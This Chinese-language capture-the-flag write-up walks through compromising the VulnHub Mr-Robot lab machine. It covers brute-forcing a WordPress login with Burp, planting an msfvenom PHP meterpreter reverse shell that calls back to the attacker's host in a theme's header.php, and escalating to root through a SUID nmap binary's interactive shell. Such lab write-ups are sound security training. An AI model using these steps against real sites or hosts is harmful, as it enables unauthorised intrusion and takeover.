Mrrobot靶机渗透实战-vuluhub系列(六)

这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshell,suid提权-nmap命令,话不多说,直接开始吧... 

靶机下载地址:
https://www.vulnhub.com/entry/mr-robot-1,151/
 

#001 实验环境(nat模式)

攻击机:kali:192.168.136.129
靶机mrrobot:192.168.136.138

 

#002 实战writeup

寻找靶机ip,查找网卡中存活的主机,找到靶机ip:192.168.136.138

netdiscover -i eth0

Mrrobot靶机渗透实战-vuluhub系列(六)_第1张图片

 

扫描一下端口开放情况

nmap -T4 -A 192.168.136.138

Mrrobot靶机渗透实战-vuluhub系列(六)_第2张图片


发现开启的端口少得可怜,访问一下80端口,进入到一个挺酷的页面,稍微玩了一会,发现没有什么利用的点,扫一下目录看看,dirbuster,一看目录就知道是wordpress的站点

 Mrrobot靶机渗透实战-vuluhub系列(六)_第3张图片

 

用wpscan扫了一下,没扫出用户名,也没看到什么可利用的点,只能另找出路,找了一下目录,实在是找不到利用的点了,去网上看了下大佬的文章,说可以利用license目录,去看看,但是并没找到密码,还得另找出路,我把目光转向了dic字典文件

 

访问一下robots.txt文件,看下有什么收获,发现了一个字典和key文件,访问字典文件后,提示下载,我就下载了下来

Mrrobot靶机渗透实战-vuluhub系列(六)_第4张图片

 

在想这里面会不会就存着后台登陆密码,所以我用burp爆破一下后台,用户密码都用这个字典

Mrrobot靶机渗透实战-vuluhub系列(六)_第5张图片

Load加载一下刚才的字典进行爆破

Mrrobot靶机渗透实战-vuluhub系列(六)_第6张图片

 

爆破了一会就出现了长度不一样的请求,单击查看

 

 

点击请求包查看response,4161长度的响应结果是invalid username
Mrrobot靶机渗透实战-vuluhub系列(六)_第7张图片

 

再查看4212长度的,用户名为elliot的请求包,返回结果是密码不对,所以确定用户名为elliot
Mrrobot靶机渗透实战-vuluhub系列(六)_第8张图片

 

然后去改一下,把用户名填正确的,只爆破密码
Mrrobot靶机渗透实战-vuluhub系列(六)_第9张图片

 

爆破了一个世纪之后,总算是爆破出来了,用户名:elliot  密码:ER28-0652

Mrrobot靶机渗透实战-vuluhub系列(六)_第10张图片

 

利用爆破出来的账号密码登陆后台,登陆成功
Mrrobot靶机渗透实战-vuluhub系列(六)_第11张图片

 

然后利用编辑模板反弹shell,生成msf反弹shell木马php的

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.136.129 lport=6666 -f raw >/root/shell.php

然后复制木马的内容,利用编辑模板getshell,我这里选择的是header.php的页面
Mrrobot靶机渗透实战-vuluhub系列(六)_第12张图片

 

将木马的内容插入模板中,点击下方的updatefile
Mrrobot靶机渗透实战-vuluhub系列(六)_第13张图片

 

Msf开启监听

Mrrobot靶机渗透实战-vuluhub系列(六)_第14张图片

 

访问http://192.168.136.138:80/wp-content/themes/twentyfifteen/header.php,看到成功反弹了meterpreter会话
Mrrobot靶机渗透实战-vuluhub系列(六)_第15张图片

 

 然后输入shell,并利用python脚本命令,转换终端,查看权限,不是root,所以需要提权

Mrrobot靶机渗透实战-vuluhub系列(六)_第16张图片

 

#003 提权操作

尝试一下用suid提权,

find / -user root -perm -4000 -print 2>/dev/null

发现竟然有nmap存在suid权限

 Mrrobot靶机渗透实战-vuluhub系列(六)_第17张图片

 

 

nmap -V 查看版本,看是否可以利用,但是发现并不能执行,可能是当前用户/usr/bin目录下没有

 

 

习惯性的进入到/home目录下,ls查看目录,cd到robot目录下,查看目录下的文件,发现了robot的账号和MD5加密的密码,MD5解密到明文为abcdefghijklmnopqrstuvwxyz
Mrrobot靶机渗透实战-vuluhub系列(六)_第18张图片

 

su切换到robot用户,看是否能执行nmap命令,成功了,果然是刚才的用户执行不了

 

nmap版本(2.02—-5.2.1)都带有交互模式,允许用户执行shell命令,接下来利用这个提权

nmap --interactive    #进入到nmap的交互模式,
!sh    #获取shell

提权成功
Mrrobot靶机渗透实战-vuluhub系列(六)_第19张图片

 

 

#004 总结归纳

robots.txt文件的利用

配合burp爆破后台

Wordpress后台修改模板getshell姿势+配合msf使用

Nmap的suid提权利用

你可能感兴趣的:(vuluhub靶机实战)